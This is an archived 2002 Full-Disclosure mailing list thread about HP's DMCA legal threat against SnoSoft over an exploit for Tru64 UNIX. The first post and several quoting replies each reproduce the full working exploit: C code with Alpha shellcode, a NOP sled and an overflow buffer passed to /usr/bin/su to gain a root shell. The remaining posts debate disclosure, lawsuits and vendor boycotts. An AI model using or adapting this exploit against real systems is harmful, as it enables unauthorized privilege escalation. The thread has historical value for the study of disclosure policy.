Mailing List Archive: OT: Snosoft vs HP

OT: Snosoft vs HP

Jul 31, 2002, 9:22 AM

Post #1 of 15 (2235 views)

It's interesting to note that the exploit was removed from
SecurityFocus' site. I wonder if HP is going to demand people
remove it from all archives everywhere?

Obligatory exploit:

/*
/bin/su tru64 5.1
works with non-exec stack enabled

stripey is the man

developed at http://www.snosoft.com in the cerebrum labs

phased
phased at mail.ru
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[]=
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
"\x12\x14\x02\x42" /* addq $16,16,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\x12\x94\x09\x42" /* addq $16,76,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
"\xfc\xff\x30\xb2" /* stl $17,-4($16) */
"\xf7\xff\x1f\xd2" /* bsr $16,-32 */
"\x10\x04\xff\x47" /* clr $16 */
"\x11\x14\xe3\x43" /* addq $31,24,$17 */
"\x20\x35\x20\x42" /* subq $17,1,$0 */
"\xff\xff\xff\xff" /* callsys ( disguised ) */
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
"\xff\xff\xff\xff"; /* callsys ( disguised ) */

/* shellcode by Taeho Oh */

main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "\x1f\x04\xff\x47";

bzero(&buffer, 8239);
bzero(&payload, 15200);

for (i=0;i<8233;i++)
buffer[i] = 0x41;

/* 0x140010401 */

buffer[i++] = 0x01;
buffer[i++] = 0x04;
buffer[i++] = 0x01;
buffer[i++] = 0x40;
buffer[i++] = 0x01;

for (i=0;i<15000;) {
for(j=0;j<4;j++) {
payload[i++] = nop[j];
}
}

for (i=i,j=0;j<sizeof(shellcode);i++,j++)
payload[i] = shellcode[j];

printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));

execl("/usr/bin/su", "su", buffer, payload, 0);

}

Re: OT: Snosoft vs HP [ In reply to ]

sert at snosoft

Jul 31, 2002, 6:39 AM

Post #2 of 15 (2208 views)

Permalink

What is even more interesting than that is the fact that a billion dollar
company like HP/Compaq would be stupid enough as to try to muscle a small
company with an argument that they know absolutely nothing about. Would
anyone with a legal background like to comment on the legal letter they sent
us which is now up on slashdot, because it seems kind of ridiculous to me and
obvious that the DMCA was never in a million years meant to be used in this
manner:

http://slashdot.org/comments.pl?sid=37074&cid=3987114

If they did somehow manage to win this kind of a suit it would put everyone
who publishes security research at the risk of being on the wrong end of
million dollar suits, being held liable for all damage done by those with
malicious intent, even though most of us have no such intent.

-sert

On Wednesday 31 July 2002 12:26 pm, ATD wrote:
> What is even more interesting is that this issue has been known for
> quite a while, yet no one did anything about it.
>
>
> Adriel
>
> On Wed, 2002-07-31 at 12:22, Len Rose wrote:
> > It's interesting to note that the exploit was removed from
> > SecurityFocus' site. I wonder if HP is going to demand people
> > remove it from all archives everywhere?
> >
> > Obligatory exploit:
> >
> > /*
> > /bin/su tru64 5.1
> > works with non-exec stack enabled
> >
> > stripey is the man
> >
> > developed at http://www.snosoft.com in the cerebrum labs
> >
> > phased
> > phased at mail.ru
> > */
> >
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <unistd.h>
> >
> > char shellcode[]=
> > "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> > "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
> > "\x12\x14\x02\x42" /* addq $16,16,$18 */
> > "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> > "\x12\x94\x09\x42" /* addq $16,76,$18 */
> > "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> > "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
> > "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
> > "\xfc\xff\x30\xb2" /* stl $17,-4($16) */
> > "\xf7\xff\x1f\xd2" /* bsr $16,-32 */
> > "\x10\x04\xff\x47" /* clr $16 */
> > "\x11\x14\xe3\x43" /* addq $31,24,$17 */
> > "\x20\x35\x20\x42" /* subq $17,1,$0 */
> > "\xff\xff\xff\xff" /* callsys ( disguised ) */
> > "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> > "\x31\x15\xd8\x43" /* subq $30,192,$17 */
> > "\x12\x04\xff\x47" /* clr $18 */
> > "\x40\xff\x1e\xb6" /* stq $16,-192($30) */
> > "\x48\xff\xfe\xb7" /* stq $31,-184($30) */
> > "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
> > "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
> > "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
> > "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
> > "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
> > "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
> > "\x38\xff\x7e\xb2" /* stl $19,-200($30) */
> > "\x13\x94\xe7\x43" /* addq $31,60,$19 */
> > "\x20\x35\x60\x42" /* subq $19,1,$0 */
> > "\xff\xff\xff\xff"; /* callsys ( disguised ) */
> >
> > /* shellcode by Taeho Oh */
> >
> > main(int argc, char *argv[]) {
> > int i, j;
> > char buffer[8239];
> > char payload[15200];
> > char nop[] = "\x1f\x04\xff\x47";
> >
> > bzero(&buffer, 8239);
> > bzero(&payload, 15200);
> >
> > for (i=0;i<8233;i++)
> > buffer[i] = 0x41;
> >
> > /* 0x140010401 */
> >
> > buffer[i++] = 0x01;
> > buffer[i++] = 0x04;
> > buffer[i++] = 0x01;
> > buffer[i++] = 0x40;
> > buffer[i++] = 0x01;
> >
> > for (i=0;i<15000;) {
> > for(j=0;j<4;j++) {
> > payload[i++] = nop[j];
> > }
> > }
> >
> > for (i=i,j=0;j<sizeof(shellcode);i++,j++)
> > payload[i] = shellcode[j];
> >
> > printf("/bin/su by phased\n");
> > printf("payload %db\n", strlen(payload));
> > printf("buffer %db\n", strlen(buffer));
> >
> > execl("/usr/bin/su", "su", buffer, payload, 0);
> >
> > }
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Full-Disclosure@lists.netsys.com
> > http://lists.netsys.com/mailman/listinfo/full-disclosure

Re: OT: Snosoft vs HP [ In reply to ]

sert at snosoft

Jul 31, 2002, 7:33 AM

Post #3 of 15 (2207 views)

Permalink

We were forced to request removal after being threatened with more legal
action by HP of course. Below is an excerpt from
http://slashdot.org/comments.pl?sid=37074&cid=3987114

-sert

-- cut from corp email --

HP hereby requests that you cooperate with us to remove the buffer
overflow exploit from securityfocus.com and to take all steps necessary
to prevent the further dissemination by SnoSoft and its agents of this
and similar exploits of Tru64 UNIX. If SnoSoft and its members fail to
cooperate with HP, then this will be considered further evidence of
SnoSoft's bad faith. Finally, HP also reserves its right to seek
whatever legal recourse it has against SnoSoft and its members for
monies and damages caused by the posting and any use of the buffer
overflow exploit

--end cut ---

On Wednesday 31 July 2002 02:02 pm, Blue Boar wrote:
> On Wed, 31 Jul 2002, Len Rose wrote:
> > It's interesting to note that the exploit was removed from
> > SecurityFocus' site. I wonder if HP is going to demand people
> > remove it from all archives everywhere?
>
> It was removed at the request of the Snosoft guys.
>
> BB
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Full-Disclosure@lists.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure

Re: OT: Snosoft vs HP [ In reply to ]

simon at snosoft

Jul 31, 2002, 9:26 AM

Post #4 of 15 (2201 views)

Permalink

What is even more interesting is that this issue has been known for
quite a while, yet no one did anything about it.

Adriel

On Wed, 2002-07-31 at 12:22, Len Rose wrote:
>
> It's interesting to note that the exploit was removed from
> SecurityFocus' site. I wonder if HP is going to demand people
> remove it from all archives everywhere?
>
> Obligatory exploit:
>
> /*
> /bin/su tru64 5.1
> works with non-exec stack enabled
>
> stripey is the man
>
> developed at http://www.snosoft.com in the cerebrum labs
>
> phased
> phased at mail.ru
> */
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
>
> char shellcode[]=
> "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
> "\x12\x14\x02\x42" /* addq $16,16,$18 */
> "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> "\x12\x94\x09\x42" /* addq $16,76,$18 */
> "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
> "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
> "\xfc\xff\x30\xb2" /* stl $17,-4($16) */
> "\xf7\xff\x1f\xd2" /* bsr $16,-32 */
> "\x10\x04\xff\x47" /* clr $16 */
> "\x11\x14\xe3\x43" /* addq $31,24,$17 */
> "\x20\x35\x20\x42" /* subq $17,1,$0 */
> "\xff\xff\xff\xff" /* callsys ( disguised ) */
> "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> "\x31\x15\xd8\x43" /* subq $30,192,$17 */
> "\x12\x04\xff\x47" /* clr $18 */
> "\x40\xff\x1e\xb6" /* stq $16,-192($30) */
> "\x48\xff\xfe\xb7" /* stq $31,-184($30) */
> "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
> "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
> "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
> "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
> "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
> "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
> "\x38\xff\x7e\xb2" /* stl $19,-200($30) */
> "\x13\x94\xe7\x43" /* addq $31,60,$19 */
> "\x20\x35\x60\x42" /* subq $19,1,$0 */
> "\xff\xff\xff\xff"; /* callsys ( disguised ) */
>
> /* shellcode by Taeho Oh */
>
> main(int argc, char *argv[]) {
> int i, j;
> char buffer[8239];
> char payload[15200];
> char nop[] = "\x1f\x04\xff\x47";
>
> bzero(&buffer, 8239);
> bzero(&payload, 15200);
>
> for (i=0;i<8233;i++)
> buffer[i] = 0x41;
>
> /* 0x140010401 */
>
> buffer[i++] = 0x01;
> buffer[i++] = 0x04;
> buffer[i++] = 0x01;
> buffer[i++] = 0x40;
> buffer[i++] = 0x01;
>
> for (i=0;i<15000;) {
> for(j=0;j<4;j++) {
> payload[i++] = nop[j];
> }
> }
>
> for (i=i,j=0;j<sizeof(shellcode);i++,j++)
> payload[i] = shellcode[j];
>
> printf("/bin/su by phased\n");
> printf("payload %db\n", strlen(payload));
> printf("buffer %db\n", strlen(buffer));
>
> execl("/usr/bin/su", "su", buffer, payload, 0);
>
> }
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Full-Disclosure@lists.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure
>
--

-------------------------------------------------------
Secure Network Operations, Inc.| http://www.snosoft.com
Cerebrum Project | cerebrum@snosoft.com
Strategic Reconnaissance Team | recon@snosoft.com
-------------------------------------------------------

RE: OT: Snosoft vs HP [ In reply to ]

SMoyer at rgare

Jul 31, 2002, 10:23 AM

Post #5 of 15 (2210 views)

Permalink

I'm looking forward to seeing more of ths novel "why patch when you can sue"
approach. Anybody wanna buy a bunch of Alphas? Cheap? Boo, hiss, and poo on
HP for this juvenile and moronic approach to dealing with an exposure. As I
read the press on this, the vuln has been known since at least spring, yet
still no patch, and when the sploit leaks, these idiots unleash the lawyers.
How lame.

Yes, it leaked through improper channels without a concurrent patch. So? I'm
more disgusted with the fact that it's taken HP this long to fix the vuln. I
guess the fired all the OSF/1 (sorry, Tru64, puke, puke, whatever) people.

I wonder if the Apache Group and Theo's bunch can pull this same swindle.
They both got blindsided by improperly released vuln's too, but rather then
kvetch and whine and point fingers, they fixed 'em and moved on.

"Please save me, DMCA! I've been violated! Waaaaah!"

--shawn

> -----Original Message-----
> From: ATD [mailto:simon@snosoft.com]
> Sent: Wednesday, July 31, 2002 11:27
> To: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] OT: Snosoft vs HP
>
>
> What is even more interesting is that this issue has been known for
> quite a while, yet no one did anything about it.
>
>
> Adriel
>
>
> On Wed, 2002-07-31 at 12:22, Len Rose wrote:
> >
> > It's interesting to note that the exploit was removed from
> > SecurityFocus' site. I wonder if HP is going to demand people
> > remove it from all archives everywhere?
> >
> > Obligatory exploit:
> >
> > /*
> > /bin/su tru64 5.1
> > works with non-exec stack enabled
> >
> > stripey is the man
> >
> > developed at http://www.snosoft.com in the cerebrum labs
> >
> > phased
> > phased at mail.ru
> > */
> >
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <unistd.h>
> >
> > char shellcode[]=
> > "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> > "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
> > "\x12\x14\x02\x42" /* addq $16,16,$18 */
> > "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> > "\x12\x94\x09\x42" /* addq $16,76,$18 */
> > "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> > "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
> > "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
> > "\xfc\xff\x30\xb2" /* stl $17,-4($16) */
> > "\xf7\xff\x1f\xd2" /* bsr $16,-32 */
> > "\x10\x04\xff\x47" /* clr $16 */
> > "\x11\x14\xe3\x43" /* addq $31,24,$17 */
> > "\x20\x35\x20\x42" /* subq $17,1,$0 */
> > "\xff\xff\xff\xff" /* callsys ( disguised ) */
> > "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> > "\x31\x15\xd8\x43" /* subq $30,192,$17 */
> > "\x12\x04\xff\x47" /* clr $18 */
> > "\x40\xff\x1e\xb6" /* stq $16,-192($30) */
> > "\x48\xff\xfe\xb7" /* stq $31,-184($30) */
> > "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
> > "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
> > "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
> > "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
> > "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
> > "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
> > "\x38\xff\x7e\xb2" /* stl $19,-200($30) */
> > "\x13\x94\xe7\x43" /* addq $31,60,$19 */
> > "\x20\x35\x60\x42" /* subq $19,1,$0 */
> > "\xff\xff\xff\xff"; /* callsys ( disguised ) */
> >
> > /* shellcode by Taeho Oh */
> >
> > main(int argc, char *argv[]) {
> > int i, j;
> > char buffer[8239];
> > char payload[15200];
> > char nop[] = "\x1f\x04\xff\x47";
> >
> > bzero(&buffer, 8239);
> > bzero(&payload, 15200);
> >
> > for (i=0;i<8233;i++)
> > buffer[i] = 0x41;
> >
> > /* 0x140010401 */
> >
> > buffer[i++] = 0x01;
> > buffer[i++] = 0x04;
> > buffer[i++] = 0x01;
> > buffer[i++] = 0x40;
> > buffer[i++] = 0x01;
> >
> > for (i=0;i<15000;) {
> > for(j=0;j<4;j++) {
> > payload[i++] = nop[j];
> > }
> > }
> >
> > for (i=i,j=0;j<sizeof(shellcode);i++,j++)
> > payload[i] = shellcode[j];
> >
> > printf("/bin/su by phased\n");
> > printf("payload %db\n", strlen(payload));
> > printf("buffer %db\n", strlen(buffer));
> >
> > execl("/usr/bin/su", "su", buffer, payload, 0);
> >
> > }
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Full-Disclosure@lists.netsys.com
> > http://lists.netsys.com/mailman/listinfo/full-disclosure
> >
> --
>
> -------------------------------------------------------
> Secure Network Operations, Inc.| http://www.snosoft.com
> Cerebrum Project | cerebrum@snosoft.com
> Strategic Reconnaissance Team | recon@snosoft.com
> -------------------------------------------------------
>
>
>

Re: OT: Snosoft vs HP [ In reply to ]

pinskia at physics

Jul 31, 2002, 10:53 AM

Post #6 of 15 (2209 views)

Permalink

Actually HP was pissed at Theo for what OpenSSH did.

It sounds like HP had to hire back the OSF/1 (oops mach opps
Utitrix oops Tru64) people back to make patches for OpenSSH.

Thanks,
Andrew Pinski

Re: OT: Snosoft vs HP [ In reply to ]

blueboar at thievco

Jul 31, 2002, 11:02 AM

Post #7 of 15 (2211 views)

Permalink

On Wed, 31 Jul 2002, Len Rose wrote:
> It's interesting to note that the exploit was removed from
> SecurityFocus' site. I wonder if HP is going to demand people
> remove it from all archives everywhere?

It was removed at the request of the Snosoft guys.

BB

Re: OT: Snosoft vs HP [ In reply to ]

len at netsys

Jul 31, 2002, 11:35 AM

Post #8 of 15 (2205 views)

Permalink

In a related note, it looks like cnet.com doesn't list the
original article on any of their main pages.. bowing to
advertising pressure, I'm sure.

(the article is still there, but has mysteriously disappeared
while much older stories remain)

http://news.com.com/2100-1023-947325.html

RE: OT: Snosoft vs HP [ In reply to ]

david.cushing at quadrasis

Jul 31, 2002, 11:36 AM

Post #9 of 15 (2200 views)

Permalink

Funny timing for this message from the government...

http://digitalmass.boston.com/news/2002/07/31/black_hat.html

LAS VEGAS -- A presidential adviser encouraged the nation's top computer security professionals and hackers Wednesday to try to break computer programs, but said they might need protection from the legal wrath of software makers.

...

RE: OT: Snosoft vs HP [ In reply to ]

Btd at valmont

Jul 31, 2002, 11:41 AM

Post #10 of 15 (2201 views)

Permalink

Security through litigation:

"Our product is secure, because we will sue you if you say otherwise."

While HP may or may not be legally in the right -- I'll let the lawyers
decide that -- I'm the one going to be up at 3AM rebuilding a server some
blackhat crashed. And I don't get paid by the hour. I intend to have a
talk with the IS director about our future acquisition and use of HP
equipment.

-----Original Message-----
From: Andrew Pinski [mailto:pinskia@physics.uc.edu]
Sent: Wednesday, July 31, 2002 12:53 PM
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] OT: Snosoft vs HP

Actually HP was pissed at Theo for what OpenSSH did.

It sounds like HP had to hire back the OSF/1 (oops mach opps
Utitrix oops Tru64) people back to make patches for OpenSSH.

Thanks,
Andrew Pinski

_______________________________________________
Full-Disclosure - We believe in it.
Full-Disclosure@lists.netsys.com
http://lists.netsys.com/mailman/listinfo/full-disclosure

Re: OT: Snosoft vs HP [ In reply to ]

tep at SDSC

Jul 31, 2002, 11:47 AM

Post #11 of 15 (2205 views)

Permalink

The topic of HP's legal action will be discussed in the vendor
selection meeting for our next bazillion-$ supercomputer (Linux
cluster) purchase.

HP/Compaq is currently rated Not Acceptable. We can't afford the
liability exposure of dealing with a company that acts in this
manner. What if one of our students or users does something that
causes HP to sue the University?

The UC lawyers are gonna hurl when they see the ramifications of this
one.

--tep

--
Tom E. Perrine <tep@SDSC.EDU> | San Diego Supercomputer Center
http://www.sdsc.edu/~tep/ |

RE: OT: Snosoft vs HP [ In reply to ]

Dkillion at netscreen

Jul 31, 2002, 11:59 AM

Post #12 of 15 (2206 views)

Permalink

Hey all,

I'm for a general boycott of all things HP until this issue is resolved in
Snosoft's favor.

What do you say? Time for a revolution?

-Dave

RE: OT: Snosoft vs HP [ In reply to ]

SMoyer at rgare

Jul 31, 2002, 12:26 PM

Post #13 of 15 (2196 views)

Permalink

Maybe this will end up like DeCSS and we'll all have to start turning
mirrors up. Can we get someone more photogenic than the 2600 people (no
offense, natch) to go to court this time? I'd hate to see this die on appeal
too. Maybe some young, likeable college kids who give good soundbite... Does
anyone know if any of the American Idol contestants hack?

--shawn

> -----Original Message-----
> From: Len Rose [mailto:len@netsys.com]
> Sent: Wednesday, July 31, 2002 13:36
> To: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] OT: Snosoft vs HP
>
>
>
> In a related note, it looks like cnet.com doesn't list the
> original article on any of their main pages.. bowing to
> advertising pressure, I'm sure.
>
> (the article is still there, but has mysteriously disappeared
> while much older stories remain)
>
> http://news.com.com/2100-1023-947325.html
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Full-Disclosure@lists.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure
>

Re: OT: Snosoft vs HP [ In reply to ]

jonathan at xcorps

Jul 31, 2002, 8:56 PM

Post #14 of 15 (2201 views)

Permalink

On Wed, 31 Jul 2002, Jay D. Dyson wrote:

> I've said it before and I'll say it again: it's about time those
> of us in the security community started to cut the legs out from under
> these corporate behemoths. They've been hammering us long enough with
> these litigious abominations; it's about damned time we fired back.

Amen brother. HP should receive no quarter from anyone in the community
until they apologize, publicly. Discover, publish. Discover, publish.
Simple as that. I think they chose to ignore the problem because they are
dropping the product. Maybe it's just me, but I find that inexcusable. I'm
just grateful that we have this list to discuss things openly.

--
Jonathan Rickman
X Corps Security
http://www.xcorps.net

Re: OT: Snosoft vs HP [ In reply to ]

tep at SDSC

Aug 1, 2002, 9:24 AM

Post #15 of 15 (2205 views)

Permalink

>>>>> On Wed, 31 Jul 2002 23:56:38 -0400 (EDT), Jonathan Rickman <jonathan@xcorps.net> said:

JR> On Wed, 31 Jul 2002, Jay D. Dyson wrote:
>> I've said it before and I'll say it again: it's about time those
>> of us in the security community started to cut the legs out from under
>> these corporate behemoths. They've been hammering us long enough with
>> these litigious abominations; it's about damned time we fired back.

JR> Amen brother. HP should receive no quarter from anyone in the community
JR> until they apologize, publicly. Discover, publish. Discover, publish.
JR> Simple as that. I think they chose to ignore the problem because they are
JR> dropping the product. Maybe it's just me, but I find that inexcusable. I'm
JR> just grateful that we have this list to discuss things openly.

This is not the first time that HP has been a specific target. Back in
1996-1997 (IIRC) there was a person or group (SOD?) vowing to release
one HP-UX bug each week, unless HP started cleaning up their act.

It was lots of exploits, lots of pretty crappy coding exposed.

Turns out that if you did a "find" on the HP-UX source code (which had
recently slipped out) for "strcpy()" calls, you would get some of the
modules in the order that matched the "HP bug of the week"
announcements.

--
Tom E. Perrine <tep@SDSC.EDU> | San Diego Supercomputer Center
http://www.sdsc.edu/~tep/ |

Mailing List Archive

Mailing List Archive

Attached Files: